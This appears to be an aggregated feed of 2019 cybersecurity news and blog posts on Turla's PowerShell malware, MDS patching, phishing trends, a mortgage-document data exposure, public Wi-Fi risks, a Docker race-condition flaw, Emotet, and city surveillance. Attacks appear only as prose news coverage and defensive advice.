ESET Exposes Turla Malware Attacks on European Diplomats

Turla, an infamous advanced persistent threat (APT) group, is using new PowerShell-based tools that provide direct, in-memory loading and execution of malware, executables and libraries. Researchers at ESET detected several attacks against diplomatic entities in Eastern Europe using PowerShell scripts, linking them to the group.

Turla is believed to have been operating since at least 2008 when it successfully breached the U.S. military. It has also been involved in major attacks against many government entities in Europe and the Middle East – among them the German Foreign Office and the French military. The group is also known as Snake or Uroburos. 

According to Malwarebytes Labs, Turla uses what is thought to be Russian governmental malware. It has infected Linux and Mac operating systems but is mostly associated with infecting Windows systems. 

The PowerShell-based tools can bypass detection techniques that are triggered when a malicious executable is dropped on a disk, which ESET researcher Matthieu Faou believes are being used globally against "other traditional Turla targets." 

The PowerShell loaders, detected by ESET under the umbrella name PowerShell/Turla, differ from simple droppers in their ability to persist on the system because they regularly load into memory only the embedded executables. In some samples, Turla developers modified their PowerShell scripts in order to bypass the Antimalware Scan Interface (AMSI). This technique leads to the antimalware product being unable to receive data from the AMSI interface for scanning.

“Along with Turla’s new PowerShell loader, we’ve discovered and analyzed several interesting payloads, including an RPC-based backdoor and a PowerShell backdoor leveraging Microsoft’s cloud storage service, OneDrive, as its command-and-control [C&C] server,” said Faou. “However, these techniques do not prevent the detection of the actual malicious payloads in memory."

One of the payloaders ESET has discovered is a whole set of backdoors relying on the RPC protocol, which are used to perform lateral movement and take control of other machines in the local network without relying on an external C&C server. 

“We believe this backdoor is a recovery access tool in case the main Turla backdoors are removed and operators can no longer access the compromised computers,” said Faou.

7 Steps For Proper Patch Management Process

Patch Management Process

At the wake of the Intel’s Microarchitectural Data Sampling flaws (MDS), data centers that depend on Intel microprocessors have their system administrators are hard at work in figuring out how to roll-out the mitigation patches timely, effectively and efficiently. Unlike a typical patch management process, mitigating MDS is not an easy undertaking, given that proof-of-concept code is available publicly and can be weaponized anytime. And since MDS is a hardware flaw, the corrective action is penalized by lower performance, as much as 40% with Intel’s Hyperthreading disabled, according to Apple.

The biggest impact will not felt by end-users, but by the enterprise, most especially server farms and cloud-service providers who use Intel processors (90% of the market share). In effect, full implementation of mitigation means that the machine’s value decreases significantly since it can only provide a portion of its expected overall performance. Luckily, AMD and ARM-based processors are not affected, a much smaller number of data centers use them and are not affected by the MDS flaws by default.

Of course, the patch management process may vary from company-to-company, and for case-to-case basis. A firm that requires a 24/7 machine for a specific critical task may remain to be unpatched for MDS if it is a stand-alone air-gapped (not connected to the public Internet) computer. Meanwhile, a machine that has a public interface requires immediate installation of mitigation patches as supplied by Intel, Microsoft, Apple, and Linux distribution providers.

Here in, we provide some tips in rolling-out an effective patch management process that has minimal impact on employee productivity without compromising IT security:

1. Build/update corporate computing inventory

Day 1 of company operations, a comprehensive inventory of all computing devices should exist. However, in the real world, it is not always the case, in some companies having a complete inventory may even be an afterthought. In the case of MDS mitigations, AMD and ARM machines are not affected, a comprehensive inventory will show the statistics how many Intel, AMD and ARM machines are currently being used in the organization. This gives the implementing team a baseline on how many machines are involved in the process of patch management software, giving them an idea of how long the procedure of updates will last.

2. Establish a list of machines that fully require the patches

Not all machines affected by a flaw or an exploit needs to be patched. Yes, you heard it right, we are advocating for a reasonable level of patch management process, not a perfect one. For the case of MDS mitigations, machines that are air-gapped need not be updated. These non-networked computers perform a specific task, and never used for any other auxiliary purpose. Non-networked computers are usually secured physically, and there is no way to remotely access them in order for a 3rd party to use a weaponized flaw against the machine.

3. Define a test machine for simulating full roll-out of patches

Installation of patches is the quickest part of any patch management process, however, rolling the patches to all the qualified machines at the same time only invites further trouble down the line. Combination of application software, drivers and other system updates from the past can complicate the patch management process. There will be times that a specific machine will not behave as expected after the installation of a patch in combination with another installed software or driver in the system. In these instances, the conflict can be determined early if the patches are deployed to test machines first or only for a limited sample of production machines.

4. Backup critical and user data before installing the patches

With the availability of cloud-backup, lower cost of hard drives and other consumer storage devices there is no valid alibi not to have a credible backup strategy. System backup for the affected machines should be implemented before rolling-out the patch management process. This way, if trouble comes such as system corruption occurs, the affected system can be restored from the backup painlessly instead of rebuilding it from scratch.

5. IT team to enforce full monitoring of patched machines for the next 24-hours

The first 24-hours after the patch management process implementation is crucial for monitoring. Once staff members start to use the patched machines again, the problem may be reported, which requires full documentation which is helpful in formulating a quick workaround or even a permanent fix at a later date.

6. Perform reconfiguration for those that failed to pass the quality test after the patch installation

A failed rolled-out does not mean leaving the machine unmitigated. There are times a small tweak is all that is needed in order to fix the problem after the patch management process. The procedure may require a Windows Registry edit, a knowledgebase instruction from the software vendor or change of commodity hardware such as a new network card.

7. Perform step 1

The post 7 Steps For Proper Patch Management Process appeared first on .

Impersonation Phishing Attacks Up 67% in Last 12 Months

Impersonation Phishing Attacks Up 67% in Last 12 Months

Mimecast has released its third annual State of Email Security Report and has found that phishing attacks have lost companies money, data and customers. Including insights from 1,025 global IT decision-makers, the report found that social engineering attacks were on the rise.

According to the study, phishing attacks were the most prominent type of cyber-attack, with 94% of respondents having experienced phishing and spear-phishing attacks in the previous 12 months. Over half (55%) cited seeing an increase in that same period.  

Most notably, the report found that impersonation attacks increased by over two-thirds (67%), with 73% of organizations impacted by impersonation attacks having experienced a direct loss. Specifically, 28% of businesses lost customers, 29% suffered financially and 40% lost data.

This surge has meant that people within organizations are losing confidence in their security. According to the report, 61% believe it is likely or inevitable their company will suffer a negative business impact from an email-borne attack this year. 

“Email security systems are the frontline defense for most of attacks. Yet just having and providing data on these attacks is not what creates value for most respondents,” says Josh Douglas, vice president of threat intelligence at Mimecast. “Survey results indicate that vendors need to be able to provide actionable intelligence out of the mass of data they collect and not just focus on indicators of compromise which would only address past problems."

According to the company's announcement on the findings, the top five industries being impacted by impersonation attacks are financial, manufacturing, professional services, science/technology and transportation. 

Other interesting statistics include: 

  • Ransomware attacks are up 26% in comparison to last year.
  • Nearly 50% of respondents noted having downtime for two to three days.
  • Just under a third experienced downtime for four to five days.

Was Your Mortgage Deal One of Nearly 900 Million Recently Exposed?

First American Financial Corp. left hundreds of millions of sensitive financial documents unprotected on its website dating back as far as 2003.

The security hole, discovered by Washington real estate developer Ben Shoval and reported by security expert Brian Krebs, allowed anyone with a web browser full access to digitized records related to mortgage deals. Among the leaked information were bank account numbers, Social Security numbers, and scans of driver licenses.

The documents on the site were accessible by simply changing a single digit on a verified URL. The company used a simple nine-digit number in every document on its site starting with 000000075, with every successive number corresponding to another person’s document.

“As of the morning of May 24, was returning documents up to the present day (885,000,000+), including many PDFs and post-dated forms for upcoming real estate closings,” Krebs reported on his findings.

“The title insurance agency collects all kinds of documents from both the buyer and seller, including Social Security numbers, driver licenses, account statements, and even internal corporate documents if you’re a small business,” Shoval said. “You give them all kinds of private information and you expect that to stay private.”

First American took the exposed website offline on the afternoon of Friday, May 24th, and a spokesperson released the following statement:

“First American has learned of a design defect in an application that made possible unauthorized access to customer data.  At First American, security, privacy and confidentiality are of the highest priority and we are committed to protecting our customers’ information. The company took immediate action to address the situation and shut down external access to the application. We are currently evaluating what effect, if any, this had on the security of customer information. We will have no further comment until our internal review is completed.”

You can read more about the data leak here.

The post Was Your Mortgage Deal One of Nearly 900 Million Recently Exposed? appeared first on Adam Levin.

New TrustArc Research Reports on Consumer Privacy Attitudes One Year Into GDPR Enforcement Era

May 25, 2019 marked the one year anniversary of the EU General Data Protection Regulation enforcement deadline. In the last twelve months, companies across the globe have been working diligently to achieve and maintain compliance under the regulation. The GDPR significantly increased the requirements on how businesses address consumer individual rights. Companies have been tasked with putting processes and systems in place in order to receive, escalate, and accommodate consumer requests. Failure to comply with the GDPR can result in fines, loss of reputation, and expenses associated with responding to any compliance investigations. During the IAPP Global Privacy Summit in … Continue reading New TrustArc Research Reports on Consumer Privacy Attitudes One Year Into GDPR Enforcement Era

The post New TrustArc Research Reports on Consumer Privacy Attitudes One Year Into GDPR Enforcement Era appeared first on TrustArc Blog.

Office 365 phishing

Let’s be honest: administering email is a pain. Routing issues, disk quotas, bouncebacks, the times when users can send but not receive emails, receive but not send, or they flat out cannot send or receive—the list goes on.

It’s no wonder that email-hosting services like Office 365 have become so popular. Such cloud-based email services remove a lot of the headaches caused by email configuration. They even include basic security features, meant to keep users safe from the latest threats.

They also provide options to simplify the user experience. Users can go directly to an Office 365 web page, enter their company credentials and log right into their email accounts from anywhere they like.

Take all this into account, add the reduction in costs that cloud email solutions often bring, and it sounds like the perfect solution. As a result, the use of services like Office 365 has skyrocketed.

Attackers have taken notice

Of course, its popularity has led to malicious attacks. Attackers are crafting and launching phishing campaigns targeting Office 365 users. The attackers attempt to steal a user’s login credentials with the goal of taking over the accounts. If successful, attackers can often log into the compromised accounts, and perform a wide variety of malicious activity:

  • Spread malware, spam, and phishing emails from within the internal network.
  • Carry out tailored attacks such as spear phishing and Business Email Compromise.
  • Target partners and customers.

At first glance, this may not seem very different than external email-based attacks. However, there is one critical difference: The malicious emails sent are now coming from legitimate accounts. For the recipient, it’s often even someone that they know, eliciting trust in a way that would not necessarily be afforded to an unknown source. To make things more complicated, attackers often leverage “conversation hijacking,” where they deliver their payload by replying to an email that’s already located in the compromised inbox.

Figure 1 – An example Office 365 phishing email.

Reconnaissance attacks

However, there’s so much more that an attacker can do besides sending emails. Once an attacker has access to a legitimate mailbox, they can also do the following:

  • Obtain global company email address lists.
  • Scan mailbox for other credentials, personal information, or company information.
  • Attempt to gain further access to company resources.

These activities can go unnoticed, simply because the attacker is gathering information while logged in using authorized credentials. This gives the attacker time for reconnaissance: a chance to observe and plan additional attacks. Nor will this type of attack set off a security alert in the same way something like a brute-force attack against a webmail client will, where the attacker guesses password after password until they get in or are detected.

The attack chain

The methods used by attackers to gain access to an Office 365 account are fairly straightforward. The phishing campaigns usually take the form of an email from Microsoft. The email contains a request to log in, claiming the user needs to reset their password, hasn’t logged in recently, or that there’s a problem with the account that needs their attention. A URL is included, enticing the reader to click to remedy the issue.

The chain of events usually plays out like this:

  1. Attacker sends a phishing email that appears to come from Microsoft or another trusted source.
  2. User clicks on link in the email, which brings them to a page mimicking the Office 365 login page.
  3. User enters login credentials, which are scooped up by the attackers.
  4. The fake page does nothing, says that the login is incorrect, or redirects the user to the real Office 365 login page.

Given this series of events, the user would be none-the-wiser that their credentials had been stolen.

Figure 2 – Office 365 login vs. phishing login. Can you spot the difference?

The frequency of attacks

How successful are these attacks? While it’s unlikely anyone but the attackers would have data on the number of stolen credentials, or overall success rate, we can draw a few conclusions by looking at the phishing emails.

Agari Data Inc. is one company that monitors a variety of data points surrounding phishing campaigns. In fact, in their quarterly Email Fraud and Identity Deception Trends report, they often look at brand impersonation trends and provided some fresh numbers for us.

Over the last few quarters, there has been a steady increase in the number of phishing emails impersonating Microsoft. While Microsoft has long been the most commonly impersonated brand, it now accounts for more than half of all brand impersonations seen in the last quarter.

Figure 3 – Brand Impersonation Phishing Emails masquerading as “Microsoft”

Cloud email security efficacy

To its credit, Microsoft has baked a number of security technologies into its Office 365 offerings. However, given how these types of phishing attacks take place off their network, there is very little that can be done from within the cloud to protect against it. If an attacker gains valid credentials and uses them, how can you tell the difference based on a login attempt?

Fortunately, there are several steps you can take to further protect your email:

  • Use multi-factor authentication. If a login attempt requires a secondary authorization before someone is allowed access to an inbox, this will stop many attackers, even with phished credentials.
  • Deploy advanced anti-phishing technologies. Some machine-learning technologies can use local identity and relationship modeling alongside behavioral analytics to spot deception-based threats.
  • Run regular phishing exercises. Regular, mandated phishing exercises across the entire organization will help to train employees to recognize phishing emails, so that they don’t click on malicious URLs, or enter their credentials into malicious websites. For instance, Duo offers a free phishing simulation tool, called Duo Insight.

On the horizon

Cloud email services like Office 365 aren’t going anywhere. Given the many advantages that they present, there’s no reason they should. The fact is, given the current threat landscape, it’s often necessary to leverage additional security.

Based on a recent study conducted by ESG on behalf of Cisco, more than 80 percent of respondents reported that their organization is using SaaS email services. However, 43 percent of respondents still found that, after the move, they required secondary security technologies in order to shore up their email defenses.

At the end of the day, there are still valid needs for IT teams to set policies, gain visibility and control, utilize sandboxes, and leverage external blocking capabilities. Cloud email offers a lot of advantages, but to fully deliver on its promise, there is still a role for IT to ensure it is as secure as it can be.

Interested in reading more on email security? We’re about to launch the next installment in our Cybersecurity Report Series. “Email: Click with Caution, How to protect against phishing, fraud, and other scams” will be released early next month! Stay tuned…

Like this post? Subscribe to the Threat of the Month blog series and get alerted when the next blog post is released. 

The post Office 365 phishing appeared first on Cisco Blog.

Using Public Wi-Fi? Your data can be hacked easily! Here’s How…

Public Wi-Fi is easily accessible by everyone, as much as free surfing sounds cool, it is risky as well. Let’s see how your data can be hacked easily.

In the contemporary world of networking, Wi-Fi has become a vital commodity. Wi-Fi are now installed in each and every place regardless of the size of the place; from international airports to small kiosks, you can find an internet connection everywhere. Most of these Wi-Fis are not operating on an individual level but are open for all. Public Wi-Fi is easily accessible by everyone be it customers of the shop or just travelers passing by and they are completely free. This means you can connect to the network and enjoy surfing without paying a single dime.

Threats of Public Wi-Fi

Public Wi-Fi attracts millions of users each year. According to a survey three out of 4 people are connecting to public Wi-Fi at some point or place and that too without giving it a second thought. As much as free surfing sounds cool, it is risky as well. There are multiple threats associated with public Wi-Fi as it is open networking and can be accessed by anyone, and this anyone even includes cybercriminals. Some common threats associated with public Wi-Fi are listed here for warning users how insecure it could be:

  • Hackers and Predators

Public Wi-Fi and hotspots are the favorite hubs of hackers and predators. With public Wi-Fi, all the data that you send and receive is open for anyone to peek in. This data may include your personal and secretive details like emails, social media accounts, passwords, bank details, and other crucial stuff. The hackers act as the middle man between you and your designated sites and record essential details of your accounts. These details can be later used for any unauthorized or illegal purpose.

  • Device Hijacking

Hackers and other cybercriminals are smarter than you think. They not only keep an eye on your online activities but also look out for ways to invade your device. If the file sharing option of your device is turned on you are most likely to receive various system up gradation files to run. When you are on a public Wi-Fi, often these files are malware; a kind of virus that hijacks your device and allow cybercriminals to access all your offline data saved in your device.

  • Malicious Networks

When you are out in the streets or are in public places, there are various public Wi-Fis approaching your device. Some of these Wi-Fis are secured with a password while others are just open for all. The open public Wi-Fi is an actual threat as it can be created by bad guys with some wrong intentions. When your device is connected to a suspicious network, the hackers get hold of your device. They can not only peek into your device but can also use your device for any illegal purpose. You will not even get any notification of activities carried out through our device and stay ignorant.

  • Cookie Theft

Cookie theft is one of the major risks of using unencrypted sites. The sites that do not have SSL (Secure Sockets Layer) connection are quite vulnerable and cookies from these sites can be accessed easily by anyone. The risk of using these sites increases to a greater extent when you are on a public Wi-Fi as it provides zero protection against data theft.

  • Spying and Snooping

Spying and keeping track of any user`s activity becomes a lot easier with public Wi-Fi. There are small hardware devices known as packet sniffer or a packet analyzer that is often installed by service providers to monitor the traffic on the network. But setting up these devices is very easy and can be installed by anyone making the task of spies and detectives easier. Data obtained from these devices reveal the statistics of all your online activities carried out through the network and can put you in danger.

  • Propagating of Viruses

Public Wi-Fi often serves as the medium of propagating viruses. There are advanced viruses, known as Computer Worms that propagates really fast through any network. Unlike the classical computer viruses that require a particular program to run, these worms can infest any device which is on the same network as the affected one. Since on public Wi-Fi, a large number of people are simultaneously connected to the same network, there are very high chances of your device to become a victim.

Public WI-FI

Tips to Stay Safe on Public Wi-Fi

Staying safe on the internet is not an easy task and this task becomes more challenging while you are using public Wi-Fi. Free Wi-Fi has its own temptations and at some instances, it becomes unavoidable to benefit from it. Though public Wi-Fi can never be completely secure, there are few tips that will assist you in making your online presence less vulnerable.

  • Enable Wi-Fi Only When Needed

Always keep your device Wi-Fi turned off when you are in public places and enable it only when needed. This may seem like an unnecessary hassle for frequent internet users but it is a mandatory thing to do while in public. If your device Wi-Fi is turned on, it can catch signals from all the available Wi-Fi in your surroundings and will automatically get connected to any open public Wi-Fi. Your device is at constant risk of connecting with malicious networks and getting affected by Worms when it’s Wi-Fi is active all the time.

  • Never Connect with Unknown Wi-Fi

Password protected public Wi-Fi are a bit safer than the open public Wi-Fi and are better to opt for. When a Wi-Fi is protected by a password it ensures that only authorized people can get access to the network and reduces the chances of having hackers on the same network. But if you really need to get connected to an open public Wi-Fi always confirm the name of the Wi-Fi with relevant people around. All the rogue Wi-Fi hotspot usually use similar names as the actual business Wi-Fi and you can easily fell prey to them if you are not cautious.

  • Browse Safely

You must always be cautious while browsing any site on the internet as it is a world full of scams and cons. The risk turns multifold when you are using public Wi-Fi to access the unauthorized site. All the sites that are authorized and provide data encryption begin with HTTPS. These sites have SSL connection and are marked by a lock sign in the address bar. Sites without SSL connection do not take any responsibility of data shared through their sites which is definitely a risk factor and this threat increases if your Wi-Fi connection is unsafe too.

  • Be Vigilant While Sharing Information

When you are on public Wi-Fi, all the data transactions to and fro your device is vulnerable to spying and snooping. Be vigilant about what you share while on public Wi-Fi and never carry out any important transaction through open networks. Remember your bank details and crucial business documents should not be risked due to mere negligence.

Also, limit your social media surfing through public hotspots as it paved the way for predators to your personal information. Logging in through a public network also provides cybercriminals easier access to our account details and password and make your accounts vulnerable to hacking. To stay safe, log in to your accounts only if needed and sign out as soon as your task is done.

  • Opt for VPN

VPN is the safest mode of surfing the internet and provides the best cybersecurity. It is a Virtual Private Network that allocates you an anonymous proxy that is usually located at a different place than your current location. It allows you to camouflage your actual identity and geographical location and keeps you safe from predators and spies.

VPN also provides an encrypted tunnel for all your online transactions and encode them in a way that nobody can access any piece of information during the transaction from one end to another. It eliminates all chances of peeking and snooping by any means.

Virtual Private Network also creates a shield between your device and incoming traffic and keeps malware and viruses at bay. Though it’s usually a paid service it is worth investing in.

  • Secure Your Device

As much as your connection needed to be secure, your device needs safety shields too. Protect your device by enabling the firewall on your device. It’s pop up notifications may be annoying but it will serve the purpose of protective shield for your device against data based malware threats. Even if you prefer to keep your device firewall turned off most of the time, enable it at least while using public Wi-Fi.

Anti-virus and anti-malware software is a must for your device security. It protects your device from invading viruses and alerts you if there is any suspicious activity in your device. Investing in an updated version of anti-virus software becomes more crucial if you use public Wi-Fi quite often on your device.

  • Forget the Network

Whenever you connect with any public Wi-Fi remove the Wi-Fi and password from your device when you leave the place. Saved Wi-Fi is usually auto connected when comes in contact with the device again without alerting you and this may become a threat for your device security.

To Conclude

Public Wi-Fi cannot be avoided completely. They provide you with the facility to connect with the word while on the go and without paying any money. This free service is available at all places from educational institutes to institutional buildings. Whether you are out of your home country for business purposes or enjoying vacations abroad, free public Wi-Fi is certainly a blessing.

There are a number of threats associated with public Wi-Fi especially the ones without any password protection but you can keep yourself safe by following simple precautionary measures. These safety tips protect you from the general tricks and scams of hackers. But if you are a frequent public Wi-Fi user you must invest in paid VPN and authentic anti-virus software for complete security of your device and online transactions.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

About Author:

About Writer: Susan Alexandra is is a cybersecurity and privacy enthusiast. She is a small business owner, traveler and investor of cryptocurrencies. Susan’s inbox is open for new ideas and stories, you can share the story ideas to susanalexandra67(at)gmail(dot)com

Pierluigi Paganini

(Security Affairs – Public Wi-Fi, hacking)

The post Using Public Wi-Fi? Your data can be hacked easily! Here’s How… appeared first on Security Affairs.

Know Your Limitations

At the end of the 1973 Clint Eastwood movie Magnum Force, after Dirty Harry watches his corrupt police captain explode in a car, he says "a man's got to know his limitations."

I thought of this quote today as the debate rages about compromising municipalities and other information technology-constrained yet personal information-rich organizations.

Several years ago I wrote If You Can't Protect It, Don't Collect It. I argued that if you are unable to defend personal information, then you should not gather and store it.

In a similar spirit, here I argue that if you are unable to securely operate information technology that matters, then you should not be supporting that IT.

You should outsource it to a trustworthy cloud provider, and concentrate on managing secure access to those services.

If you cannot outsource it, and you remain incapable of defending it natively, then you should integrate a capable managed security provider.

It's clear to me that a large portion of those running PI-processing IT are simply not capable of doing so in secure manner, and they do not bear the full cost of PI breaches.

They have too many assets, with too many vulnerabilities, and are targeted by too many threat actors.

These organizations lack sufficient people, processes, and technologies to mitigate the risk.

They have successes, but they are generally due to the heroics of individual IT and security professionals, who often feel out-gunned by their adversaries.

If you can't patch a two-year-old vulnerability prior to exploitation, or detect an intrusion and respond to the adversary before he completes his mission, then you are demonstrating that you need to change your entire approach to information technology.

The security industry seems to think that throwing more people at the problem is the answer, yet year after year we read about several million job openings that remain unfilled. This is a sign that we need to change the way we are doing business. The fact is that those organziations that cannot defend themselves need to recognize their limitations and change their game.

I recognize that outsourcing is not a panacea. Note that I emphasized "IT" in my recommendation. I do not see how one could outsource the critical technology running on-premise in the industrial control system (ICS) world, for example. Those operations may need to rely more on outsourced security providers, if they cannot sufficiently detect and respond to intrusions using in-house capabilities.

Remember that the vast majority of organizations do not exist to run IT. They run IT to support their lines of business. Many older organizations have indeed been migrating legacy applications to the cloud, and most new organizations are cloud-native. These are hopeful signs, as the older organizations could potentially  "age-out" over time.

This puts a burden on the cloud providers, who fall into the "managed service provider" category that I wrote about in my recent Corelight blog. However, the more trustworthy providers have the people, processes, and technology in place to handle their responsibilities in a more secure way than many organziations who are struggling with on-premise legacy IT.

Everyone's got to know their limitations.

Epsiode 502 – Encryption Is Usually Deployed Improperly

Encryption is a powerful and effective solution to protecting your data and recources. However, it is a complicated implementation and a recent research report that most deploy it poorly. This epsiode talks about the challenges of encryption implementations.  Be aware, be safe. *** Support the podcast with a cup of coffee *** – Ko-Fi Security […]

The post Epsiode 502 – Encryption Is Usually Deployed Improperly appeared first on Security In Five.

All Docker versions affected by an unpatched race condition issue

A race condition flaw that could be exploited by an attacker to read and write any file on the host system affects any versions of Docker. 

Experts found a race condition vulnerability in any versions of Docker, the vulnerability could be exploited by an attacker to read and write any file on the host system.

Technically the flaw, tracked as CVE-2018-15664, is a time-to-check-time-to-use (TOCTOU) flaw caused by changes in a system between the checking of a condition (i.e. authorization check) and the use of the results of that check.

“In Docker through 18.06.1-ce-rc2, the API endpoints behind the ‘docker cp‘ command are vulnerable to a symlink-exchange attack with Directory Traversal, giving attackers arbitrary read-write access to the host filesystem with root privileges, because daemon/archive.go does not do archive operations on a frozen filesystem (or from within a chroot).” reads the description for this issue.

docker logo-696x364

The issue resides in the FollowSymlinkInScope function that allows resolving a specified path in a secure way. FollowSymlinkInScope is a wrapper around evalSymlinksInScope that returns an absolute path. This function handles paths in a platform-agnostic manner.

“If you’re not familiar with FollowSymlinkInScope, its job is to take a path and safely resolve it as though the process was inside the container. After the full path has been resolved, the resolved path is passed around a bit and then operated on a bit later (in the case of ‘docker cp’ it is opened when creating the archive that is streamed to the client).” reads the advisory published by SUSE. “As you may notice, if an attacker can add a symlink component to the path after the resolution but before it is operated on, then you could end up resolving the symlink path component on the host as root. In the case of ‘docker cp’ this gives you read and write access to any path on the host.”

The process leverages the ‘docker cp’ utility to copy content between a container and the local filesystem.

“As far as I’m aware there are no meaningful protections against this kind of attack (other than not allowing “docker cp” on running containers — but that only helps with his particular attack through FollowSymlinkInScope). Unless you have restricted the Docker daemon through AppArmor, then it can affect the host filesystem,” continues the advisory.

A possible attack scenario sees an attacker to be active within a container while the host administrator is running docker cp to copy data in or out of the container.

Aleksa Sarai, senior software engineer who discovered the issue, proposes as mitigation the modification of the ‘chrootarchive‘ to run archive operations in a secure environment where the root is the container ‘rootfs.’

“The most complete solution to this problem would be to modify chrootarchive so that all of the archive operations occur with the root as the container rootfs (and not the parent directory, which is what causes the vulnerability since the parent is attacker-controlled),” said Sarai.

“Unfortunately, changes to this core piece of Docker are almost impossible (the TarUntar interface has many copies and reimplementations that would all need to be modified to be able to handle a new ‘root’ argument).”

The changes impact a core part of Docker, this means that it could be not feasible.

Another mitigation consists of pausing the container when accessing the filesystem, this option could give protection against the more basic attacks that exploit the issue.

At the time of writing, a security patch has been submitted upstream and is currently under review.

Aleksa Sarai also developed two scripts to trigger the vulnerability and get respectively read and write access to the host system.

“Attached is a fairly dumb reproducer which basically does a RENAME_EXCHANGE of a symlink to “/” and an empty directory in a loop, hoping to hit the race condition. Then our “user” attempts to copy a file from the path repeatedly.” explained the expert. “You can call it like this (note that since this requires exploiting a race condition, only a small percentage of the attempts succeed — however if I had made my reproducer a bit more clever about how quickly it does the RENAME_EXCHANGE it could be more likely to hit the race).”

The expert explained that the success rate for his reproducer is 0.6%, that could appear as bad, but using it for a time frame of a dozen of seconds could allow reaching the success.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Docker, hacking)

The post All Docker versions affected by an unpatched race condition issue appeared first on Security Affairs.

When it comes to email-based threats, Emotet dominates

Emotet displaced credential stealers, stand-alone downloaders and RATs and became the most prominent threat delivered via email, Proofpoint has shared. According to the firm’s statistics, in Q1 2019 a whooping 61 percent of all malicious payloads distributed via email were Emotet. The nature of the malicious payloads Emotet started its life as a banking Trojan, but has morphed over time and became a malware multi-tool, capable of downloading additional malware, stealing passwords, performing brute-force attacks … More

The post When it comes to email-based threats, Emotet dominates appeared first on Help Net Security.

Global Privacy Concerns: The World’s Top Five Cities Using Invasive Technology

Reading Time: ~5 min.

Cities are expanding their technological reach. Many of their efforts work to increase public protections, such as using GPS tracking to help first responders quickly locate the site of a car accident. But, in the rush for a more secure and technologically advanced city, privacy can fall by the wayside. We’ve reviewed the top cities around the world that are using technologies that may invade citizens’ privacy, so you know what to expect and what you can do. 

Beijing, China 

China is infamous for its mass surveillance, with Beijing often serving as a testing ground for new surveillance software. The Chinese government uses internet monitoring, GPS tracking, and the “world’s biggest camera surveillance system”, with more than 170 million CCTV cameras to monitor the country’s populace. These CCTV cameras are backed by powerful facial recognition algorithms, which can track an individual down in just seven minutes. It is safe to say that you are probably being monitored anywhere you travel while in China, but a general rule is that, the higher the population, the more surveillance there is.  

The town of Yizhuang has more than 2,243 high definition security cameras, 277 vehicle recognition cameras, and 267 facial recognition cameras. It also features six patrol vehicles with mobile cameras, and enforcement officers equipped with video capture equipment. Each of these cameras is sending live video streams to a main control center 24/7—all to monitor a single 11-square-mile suburb of Beijing. 

Beijing is also preparing to roll out a social credit system in 2020. This system will award personal trustworthiness points to citizens and businesses based on their financial credit scores, as well as their personal and professional behavior. In the meantime, how the Chinese government plans to use this system to reward or punish its citizens remains a mystery. 

Moscow, Russia 

Not one to be outdone, Russia has also embraced mass CCTV surveillance. Moscow alone has more than 170,000 cameras, making it the most surveilled city in Russia. Facial recognition software is paired with this massive network of cameras to track down persons of interest, though exactly what defines a “person of interest” is somewhat nebulous. In fact, Moscow officials recently admitted that they “can now trace the debtors’ movements,” thanks to this massive network of CCTV cameras. He declined to comment on the number of debtors who have been traced using this technology, nor the severity of their debts. 

Darwin, Australia 

Darwin, Australia is piloting a surveillance system similar to the technologies used in China, with some warning that it could evolve into a social credit system. Darwin has installed poles throughout the city outfitted with speakers, cameras, and WiFi. These monitoring stations track people and their movements all around the city, and are aided by facial recognition software. They can even respond to triggers, such as when a specific individual breaches a “virtual fence.” 

“We’ll be getting sent an alarm saying, ‘There’s a person in this area that you’ve put a virtual fence around.’ … Boom, an alert goes out to whatever authority, whether it’s us or police to say ‘Look at camera five,’” said Josh Sattler, the Darwin Council’s General Manager for Innovation, Growth, and Development services in an article with NT News.  

This system also tracks mobile phone use, web traffic, and mobile app usage—but only to help local businesses, of course. 

“[It will tell us] where people are using WiFi, what they’re using WiFi for, are they watching YouTube, etc., all these bits of information we can share with businesses… we can let businesses know ‘Hey, 80 percent of people actually use Instagram within this area of the city, between these hours,’” said Sattler. 

New York City, USA 

In an effort to assist its police force, NYC has turned to the world’s largest surveillance technology company—the Chinese state-owned Hikvision—to install the same surveillance tools being used in China. Thousands of surveillance cameras have been operating in New York City since 2014, using the same facial recognition software that enables law enforcement in Beijing to locate and track individuals within the city. These cameras are equipped with infrared sensors that help capture high resolution images even in very low light. The NYPD has direct access to this surveillance network, and monitors the footage remotely to avoid showing an obvious police presence. The full extent of the surveillance in New York is unknown, but reports indicate the NYPD is using these products on a “large scale.” 

Hillsboro, USA 

Hillsboro, Oregon is the smallest city on this list, with a population of just over 100,000. So why is such a small town on the same list as places like Beijing, Moscow, and New York? The Washington County Sheriff’s Office, which presides over Hillsboro, recently became the first law enforcement agency in the United States to use Amazon’s AI-powered facial recognition tool, Rekognition. As this is the first real-world test of this technology, its accuracy is hotly debated. Many experts argue that this technology will likely lead to the wrongful arrest of innocent people whose only crime is bearing a resemblance to the accused. 

More than 300,000 mug shots taken at the Washington County jail have been uploaded into the Rekognition system. These pictures can be cross-referenced with images from a security camera, social media accounts, or even a deputy’s mobile device—without requiring a warrant. More than 1,000 facial recognition searches were logged into the Rekognition system by the Washington County Sheriff’s Office, but public records requests show that only nine official case reports mention the use of the tool. Washington County deputies are under no imperative to note when facial recognition software assisted with an arrest, so we have no way to judge how accurate the system is. 

Your Privacy is Your Concern 

While the only way to avoid detection through the facial recognition algorithms is to hide or alter your face, there are some precautions you can take to protect your privacy when visiting these cities. As an example, you can easily obscure your digital traffic, which can help prevent the kind of tracking reported in Darwin. Strong encryption is your best protection against privacy invasive cities. Research a reliable VOIP and text messaging encryption service, and invest in a trusted VPN to shield your web and mobile traffic. Encryption may not stop state actors from intercepting your data, but it will make it nearly impossible for them to interpret it. 

Have other tips for protecting your privacy while traveling? Let us know in the comments. 

The post Global Privacy Concerns: The World’s Top Five Cities Using Invasive Technology appeared first on Webroot Blog.

F5 ACI ServiceCenter app: Combine L2-3 network connectivity with L4-7 application services

F5 Networks is introducing the F5 ACI ServiceCenter app to seamlessly combine L2-3 network connectivity with L4-7 application services within Cisco ACI environments. Available through Cisco’s ACI App Center, this integration app enhances visibility and control throughout the network and application stack to help customers accelerate application deployment within flexible, software-defined IT infrastructures. F5’s participation in the Cisco ACI App Center gives joint customers the flexibility to deploy a full complement of services, such as … More

The post F5 ACI ServiceCenter app: Combine L2-3 network connectivity with L4-7 application services appeared first on Help Net Security.

How to Secure DNS Servers and Prevent Security Issues

